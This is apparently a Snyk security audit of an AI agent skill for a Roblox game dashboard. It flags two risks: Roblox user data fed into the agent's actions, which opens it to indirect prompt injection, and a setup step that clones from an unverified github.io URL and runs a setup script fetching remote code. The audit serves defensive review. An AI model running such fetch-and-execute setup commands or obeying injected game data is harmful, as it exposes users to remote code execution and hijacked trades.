mm2-analytics-dashboard-roblox

Warn

Audited by Snyk on May 16, 2026

Risk Level: MEDIUM
Full Analysis

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 0.90). The SKILL.md explicitly instructs syncing and ingesting user data from Roblox (e.g., "python3 main.py --sync-inventory" and InventoryManager.sync_from_roblox()) and uses that user-generated game/inventory and recent-game data to drive AI recommendations and trade/strategy actions, exposing the agent to untrusted third-party content that could carry an indirect prompt injection.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill's automated setup runs "git clone https://8015238355.github.io" and then makes and executes "./setup.sh --install", which fetches remote code from https://8015238355.github.io and executes it during setup, presenting a clear remote-code-execution risk.

Audit Metadata

Risk Level: MEDIUM
Analyzed: May 16, 2026, 11:25 PM
Issues: 2